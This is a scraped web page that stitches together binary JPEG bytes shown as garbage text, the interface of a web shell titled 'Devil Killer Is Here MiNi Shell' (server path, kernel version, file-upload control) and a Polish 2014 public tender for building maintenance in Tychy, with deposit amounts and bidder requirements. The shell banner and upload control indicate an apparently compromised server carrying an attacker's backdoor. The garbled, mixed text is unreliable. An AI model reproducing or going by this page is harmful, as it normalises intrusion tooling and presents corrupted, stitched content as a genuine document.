JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141204/398916-N-2014.html

<p class="kh_header"><b>Tychy: Świadczenie usług w zakresie bieżącej konserwacji i czynności całodobowego 
pogotowia technicznego oraz wykonywanie napraw i robót budowlanych w obrębie 
zasobów gminy administrowanych przez Miejski Zarząd Budynków Mieszkalnych 
     w Tychach</b><br>
<b>Numer ogłoszenia: 398916 - 2014; data zamieszczenia: 04.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Budynków Mieszkalnych , ul. Filaretów 31, 43-100 Tychy, woj. śląskie, tel. 032 2274091 w. 133, faks 032 2273145.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.umtychy.pl/jednostki-organizacyjne-miasta/35</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gminna Samorządowa Jednostka Organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie bieżącej konserwacji i czynności całodobowego 
pogotowia technicznego oraz wykonywanie napraw i robót budowlanych w obrębie 
zasobów gminy administrowanych przez Miejski Zarząd Budynków Mieszkalnych 
     w Tychach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1Przedmiotem zamówienia jest świadczenie usług w zakresie bieżącej konserwacji i czynności 
    całodobowego pogotowia technicznego oraz wykonywanie napraw i robót budowlanych 
    w obrębie zasobów gminy, którymi w imieniu Zamawiającego administruje Miejski Zarząd 
     Budynków Mieszkalnych w Tychach, poprzez swoje jednostki organizacyjne zwane dalej 
     ROM- em, a to:  
     -   ROM Nr I   z siedzibą w Tychach przy ul. Arkadowej 9c 
     -   ROM Nr II  z siedzibą w Tychach przy ul. Budowlanych 41
     -   ROM Nr III z siedzibą w Tychach przy ul. Cyganerii 43
     -   ROM Nr IV z siedzibą w Tychach przy al. Niepodległości 76 
     -   ROM Nr V  z siedzibą w Tychach przy ul. Budowlanych 41 

2.	 Zamówienie podzielone jest na 5 (pięć)  części zwanych zadaniami:

  ZADANIE Nr 1  -  Świadczenie usług w zakresie bieżącej konserwacji i czynności
  całodobowego pogotowia technicznego oraz wykonywanie napraw i robót budowlanych 
  w obrębie zasobów gminy administrowanych przez ROM Nr I

  ZADANIE Nr 2 -  Świadczenie usług w zakresie bieżącej konserwacji i czynności
  całodobowego pogotowia technicznego oraz wykonywanie napraw i robót budowlanych 
  w obrębie zasobów gminy administrowanych przez ROM Nr II

  ZADANIE Nr 3 -   Świadczenie usług w zakresie bieżącej konserwacji i czynności
  całodobowego pogotowia technicznego oraz wykonywanie napraw i robót budowlanych 
  w obrębie zasobów gminy administrowanych przez ROM Nr III

  ZADANIE Nr 4 -  Świadczenie usług w zakresie bieżącej konserwacji i czynności
  całodobowego pogotowia technicznego oraz wykonywanie napraw i robót budowlanych 
  w obrębie zasobów gminy administrowanych przez ROM Nr IV

  ZADANIE Nr 5 -  Świadczenie usług w zakresie bieżącej konserwacji i czynności
  całodobowego pogotowia technicznego oraz wykonywanie napraw i robót budowlanych 
  w obrębie zasobów gminy administrowanych przez ROM Nr V

3.	Zakres zamówienia: 
  1) bieżąca obsługa konserwacyjna polegająca na utrzymaniu w pełnej sprawności technicznej   
    wewnętrznych instalacji: wod-kan, c.o.,  c.c.w. , gazowej i elektrycznej;

2)	świadczenie czynności całodobowego pogotowia technicznego;

  3)  wykonywanie napraw i robót budowlanych wykraczających poza zakres bieżącej  
 konserwacji w obrębie zasobów gminy;


4. Szczegółowy zakres obowiązków zawiera (powtarzalny dla wszystkich zadań) -załącznik nr 1 
  do projektu umowy.   

5. Szczegółowy wykaz adresów nieruchomości w podziale na poszczególne zadania zawierają 
    załączniki do projektu umowy:.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w trybie zamówienia 
     z wolnej ręki, których wartość nie przekroczy 50 % wartości zamówienia podstawowego 
     danej części zamówienia, na zasadach określonych w art. 67 ust.1. pkt 6) ustawy - PZP</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.30.00.00-0, 45.33.00.00-9, 45.33.30.00-0, 45.31.12.00-2, 45.26.19.00-3, 45.26.13.20-6, 45.41.00.00-3, 45.42.00.00-7, 45.42.11.31-1, 45.42.11.32-8, 45.23.32.53-7, 50.70.00.00-2, 50.87.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca przystępujący do przetargu jest zobowiązany wnieść wadium. Wadium należy  wnieść na wybrane zadanie (-a)  - na czas związania ofertą. 
Przy wnoszeniu wadium wykonawca winien powołać się na nazwę wybranego zadania.
2.	Wymagane kwoty wadium w podziale na zadania:
      ZADANIE Nr 1  -  wadium wynosi:  6 500,00 zł  (słownie: sześć tysięcy pięćset złotych);                         
 	
      ZADANIE Nr 2  -  wadium wynosi:  1 200,00 zł  (słownie:  jeden tysiąc dwieście złotych);  
                          	
      ZADANIE Nr 3  -  wadium wynosi:  1 000,00 zł   (słownie: jeden tysiąc złotych);
                          
      ZADANIE Nr 4  -  wadium wynosi:  2 800,00 zł   (słownie: dwa tysiące osiemset złotych);

      ZADANIE Nr 5  -  wadium wynosi:  1 000,00 zł (słownie: jeden tysiąc złotych);                
3.	Wadium musi być wniesione przed upływem terminu składania ofert.
3.	Przy wnoszeniu wadium Wykonawca winien powołać się na nazwę przetargu.
4.	Wadium może być wnoszone w jednej lub kilku następujących formach:
a)	pieniądzu:
wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego:
Bank PKO S.A.  o / Tychy
Nr rachunku bankowego: 71 1020 2528 0000 0202 0267 3846
Wadium wniesione w formie pieniężnej musi znajdować się na koncie Zamawiającego przed upływem terminu składania ofert.
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,                    
d)	gwarancjach ubezpieczeniowych, 
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy 
z dn. 09.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007 r. Nr 42, poz. 275 , z późn. zm.).
5.	W przypadku wadium wniesionego w formie innej niż pieniężna - oryginał dowodu wniesienia   wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego, w Tychach przy ul. Filaretów 31 w Dziale Księgowości (pokój nr 4)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-   Zamawiający nie opisuje sposobu dokonywania spełniania warunku udziału w tym   
    zakresie;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że  wykonawca spełnia warunek udziału dotyczący posiadania
   wiedzy i doświadczenia (art. 22 ust.1 pkt 2 ustawy - PZP), Zamawiający wymaga złożenia 
   następujących dokumentów: 
1)   wykaz wykonanych, a przypadku świadczeń okresowych lub ciągłych również  
         wykonywanych, głównych usług, w okresie ostatnich trzech lat przed upływem terminu 
         składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, wraz 
         z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi 
         zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są 
         wykonywane należycie i tak:
    a)  dla ZADANIA Nr 1   - należy wykazać wykonanie/ wykonywanie z należytą starannością
         co najmniej 2 usług w ramach dwóch odrębnych umów, przez okres co najmniej 
         12 miesięcy w zakresie bieżącej konserwacji ze świadczeniem czynności całodobowego 
         pogotowia technicznego o wartości nie mniejszej niż 36 000,00 zł (brutto)/12 miesięcy- 
         każda z usług;

   b)  dla ZADANIA Nr 2   - należy wykazać wykonanie/ wykonywanie z należytą starannością
         co najmniej 2 usług w ramach dwóch odrębnych umów, przez okres co najmniej 
        12 miesięcy w zakresie bieżącej konserwacji ze świadczeniem czynności całodobowego 
         pogotowia technicznego o wartości nie mniejszej niż 9 000,00 zł (brutto)/12 miesięcy- 
        każda z usług;

   c)  dla ZADANIA Nr 3   - należy wykazać wykonanie/ wykonywanie z należytą starannością
        co najmniej 2 usług w ramach dwóch odrębnych umów, przez okres co najmniej 
        12 miesięcy w zakresie bieżącej konserwacji ze świadczeniem czynności całodobowego 
         pogotowia technicznego o wartości nie mniejszej niż 10 000,00 zł (brutto)/12 miesięcy- 
         każda z usług;


   d)  dla ZADANIA Nr 4   - należy wykazać wykonanie/ wykonywanie z należytą starannością
        co najmniej 2 usług w ramach dwóch odrębnych umów, przez okres  co najmniej 12 
        miesięcy w zakresie bieżącej konserwacji ze świadczeniem czynności całodobowego 
        pogotowia technicznego o wartości nie mniejszej niż 16 000,00 zł (brutto)/12 miesięcy- 
        każda z usług;

    e)  dla ZADANIA Nr 5   - należy wykazać wykonanie/ wykonywanie z należytą starannością
         co najmniej 2 usług w ramach dwóch odrębnych umów, przez okres co najmniej
        12 miesięcy w zakresie bieżącej konserwacji ze świadczeniem czynności całodobowego 
        pogotowia technicznego o wartości nie mniejszej niż 9 000,00 zł (brutto)/12 miesięcy - 
        każda z usług;
     oraz
   2)   wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem 
         terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym              
         okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz                 
         załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te
         zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie 
         z zasadami sztuki budowlanej i prawidłowo ukończone.
         Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że wykonał                
         z należytą starannością, i tak:

    a)  dla ZADANIA Nr 1   - należy wykazać co najmniej 2 roboty budowlano -instalacyjne w 
         zakresie wykonania remontu w zamieszkałych budynkach mieszkalnych lub 
         funkcjonujących budynkach użyteczności publicznej (będące przedmiotem jednej umowy 
         każda) o wartości nie mniejszej niż 115 000,00 zł (brutto) - każda z robót);


    b)  dla ZADANIA Nr 2   - należy wykazać co najmniej 2 roboty budowlano -instalacyjne w 
         zakresie wykonania remontu w zamieszkałych budynkach mieszkalnych lub 
         funkcjonujących budynkach użyteczności publicznej (będące przedmiotem jednej umowy 
         każda) o wartości nie mniejszej niż 20 000,00 zł (brutto) - każda z robót);



    c)  dla ZADANIA Nr 3   - należy wykazać co najmniej 2 roboty budowlano -instalacyjne w 
         zakresie wykonania remontu w zamieszkałych budynkach mieszkalnych lub 
         funkcjonujących budynkach użyteczności publicznej (będące przedmiotem jednej umowy 
         każda) o wartości nie mniejszej niż 15 000,00 zł (brutto) - każda z robót);



   d)  dla ZADANIA Nr 4   - należy wykazać co najmniej 2 roboty budowlano -instalacyjne w 
         zakresie wykonania remontu w zamieszkałych budynkach mieszkalnych lub 
         funkcjonujących budynkach użyteczności publicznej (będące przedmiotem jednej umowy 
         każda) o wartości nie mniejszej niż 40 000,00 zł (brutto) - każda z robót);




    e)  dla ZADANIA Nr 5   - należy wykazać co najmniej 2 roboty budowlano -instalacyjne w 
         zakresie wykonania remontu w zamieszkałych budynkach mieszkalnych lub 
         funkcjonujących budynkach użyteczności publicznej (będące przedmiotem jednej umowy 
         każda) o wartości nie mniejszej niż 17 000,00 zł (brutto) - każda z robót);




  3)    Do wykazu usług należy dołączyć dowody potwierdzające, że usługi zostały wykonane 
         należycie, natomiast do wykazu robót budowlanych dołączyć dowody potwierdzające ,że 
         roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
         Dowodami , o których mowa powyżej są:
     a)  poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych 
          lub ciągłych poświadczenie powinno być wydane nie wcześniej niż 3 miesiące przed 
     upływem terminu składania ofert
     b)  w przypadku zamówień na roboty budowlane - inne dokumenty - jeżeli z uzasadnionych 
          przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać 
          poświadczenia, o którym mowa w pkt 3a)
     c)  w przypadku zamówień na dostawy lub usługi - oświadczenie wykonawcy - jeżeli 
          z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie 
    uzyskać poświadczenia, o którym mowa w pkt 3a)
          Wykaz usług i robót budowlanych należy sporządzić odrębnie na każde wybrane 
          zadanie -  wg wzoru druku stanowiącego załącznik nr 3 i 4 do SIWZ.     
         (W przypadku podmiotów występujących wspólnie w/w warunki udziału wykonawcy mogą 
         spełniać łącznie lub co najmniej jeden z Wykonawców).   

        W przypadku, gdy Zamawiający jest podmiotem , na rzecz którego usługi  i roboty 
          wskazane w wykazie zostały wcześniej wykonane, Wykonawca nie ma obowiązku 
          przedkładania poświadczeń , o których mowa powyżej.

               W razie konieczności, szczególnie gdy wykaz lub dowody, o których mowa w     
               p.pkt 1) , 2) i  3) budzą wątpliwości Zamawiającego 
               lub gdy z poświadczenia albo z innego dokumentu wynika, że zamówienie nie zostało  
               wykonane lub zostało wykonane nienależycie, zamawiający może zwrócić się 
              bezpośrednio do właściwego podmiotu , na rzecz którego roboty budowlane , dostawy lub 
              usługi były lub miały zostać wykonane, o przedłożenie dodatkowych informacji lub 
              dokumentów bezpośrednio Zamawiającemu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca spełnia warunek udziału dotyczący dysponowania 
       odpowiednim potencjałem technicznym do wykonania zamówienia (art. 22 ust. 1 pkt 3 
       ustawy - PZP) Zamawiający wymaga złożenia następujących dokumentów:
        -  wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych 
       Wykonawcy usług w celu wykonania zamówienia wraz z informacją o podstawie
       dysponowania tymi zasobami.
       Wymagane jest dysponowanie następującymi narzędziami, wyposażeniem 
       i urządzeniami:   
-     co najmniej jednym urządzeniem pomiarowym do zdalnego odczytu wskazań wodomierzy dla odbiorców indywidualnych będących w zasobach Zamawiającego, z możliwością przekazywania danych do systemu rozliczeń Zamawiającego.

   W przypadku składania ofert dla 2 zadań można wykazać to samo urządzenie.

  Wykaz narzędzi i urządzeń należy sporządzić wg wzoru druku stanowiącego załącznik nr 5 
  do SIWZ.   
  (W przypadku podmiotów występujących wspólnie warunek ten Wykonawcy mogą spełniać  
    łącznie lub co najmniej jeden z Wykonawców).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca spełnia warunek udziału dotyczący dysponowania
        osobami zdolnymi do wykonania zamówienia (art. 22 ust. 1 pkt 3 ustawy - PZP) 
        Zamawiający żąda następujących dokumentów:
   1)  Wykazu osób , które będą uczestniczyć w wykonywaniu zamówienia, w szczególności 
         odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami 
        budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia 
        i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych 
        przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.
         Wymagane jest dysponowanie osobą /osobami zdolnymi do wykonania zamówienia,   
        w szczególności:
a)	co najmniej jedną osobą posiadającą uprawnienia budowlane do kierowania robotami 
	w  specjalności konstrukcyjno - budowlanej , z co najmniej 3 letnim doświadczeniem; 

   b)  co najmniej jedną osobą posiadającą uprawnienia do wykonywania pracy na stanowisku 
         dozoru w zakresie obsługi , konserwacji, remontów , montażu kontrolno- pomiarowym 
        dla urządzeń, instalacji i sieci gazowych, z co najmniej 3 letnim doświadczeniem;

  c)    co najmniej jedną osobą posiadającą uprawnienia do wykonywania pracy na stanowisku           
        eksploatacji w zakresie obsługi , konserwacji, remontów , montażu kontrolno- 
        pomiarowym dla urządzeń, instalacji i sieci gazowych , z co najmniej 3 letnim 
         doświadczeniem;

   d)   co najmniej jedną osobą posiadającą uprawnienia do zajmowania się eksploatacją
         urządzeń, instalacji i sieci elektroenergetycznych do 1KV na stanowisku dozoru , z co 
         najmniej 3 letnim doświadczeniem;

e)   co najmniej jedną osobą, posiadającą uprawnienia do wykonania pracy na stanowisku 
         eksploatacji urządzeń i instalacji elektroenergetycznych o napięciu do 1 kV , z co najmniej 
         3 letnim doświadczeniem;

f)   co najmniej jedną osobą posiadającą uprawnienia do wykonywania pomiarów ochron
        przeciwporażeniowych i instalacji odgromowych , z co najmniej 3 letnim doświadczeniem;

        W przypadku składania ofert na 2 zadania Wykonawca może wskazać te same 
        osoby.
        (W przypadku podmiotów występujących wspólnie w/w warunki udziału wykonawcy mogą 
        spełniać łącznie lub co najmniej jeden z Wykonawców).    
        Wykaz osób na wybrane zadanie (- a) należy sporządzić wg wzoru druku stanowiącego 
        załącznik nr 6 do SIWZ.

2) Oświadczenie, że osoby, które będą uczestniczyć w wykonaniu zamówienia posiadają 
          wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 
          Oświadczenie należy sporządzić wg wzoru stanowiącego załącznik nr 7 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca spełnia warunek udziału dotyczący posiadania        
        wymaganej sytuacji ekonomicznej i finansowej  (art. 22 ust. 1 pkt  4 ustawy - PZP), 
       Zamawiający wymaga, złożenia następujących dokumentów: 
        opłaconej polisy, a w przypadku jej braku , innego dokumentu potwierdzającego, że 
 Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej 
 działalności związanej z przedmiotem zamówienia.
 Wymagane jest posiadanie ww. dokumentu o wartości ubezpieczenia nie mniejszej niż: 
 1)   250 000,00 zł   -  dla ZADANIA Nr 1
        2)    50 000,00 zł   -  dla ZADANIA Nr 2
        3)    44 000,00 zł   -  dla ZADANIA Nr 3
        4)  100 000,00 zł   -  dla ZADANIA Nr 4
        5)    40 000,00 zł   -  dla ZADANIA Nr 5
       Do oferty należy dołączyć potwierdzenie opłacenia polisy l u b  fakt  jej opłacenia 
       musi wynikać z treści dokumentu.
       Jeżeli fakt opłacenia polisy nie wynika wprost z załączonego do oferty dokumentu 
       Wykonawca jest zobowiązany dołączyć inny dokument potwierdzający opłacenie składki 
       (np. kopia przelewu składki, potwierdzenie ubezpieczyciela).

                                (W przypadku podmiotów występujących wspólnie niniejsze warunki udziału 
       podmioty mogą spełniać  łącznie lub co najmniej jeden podmiot).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

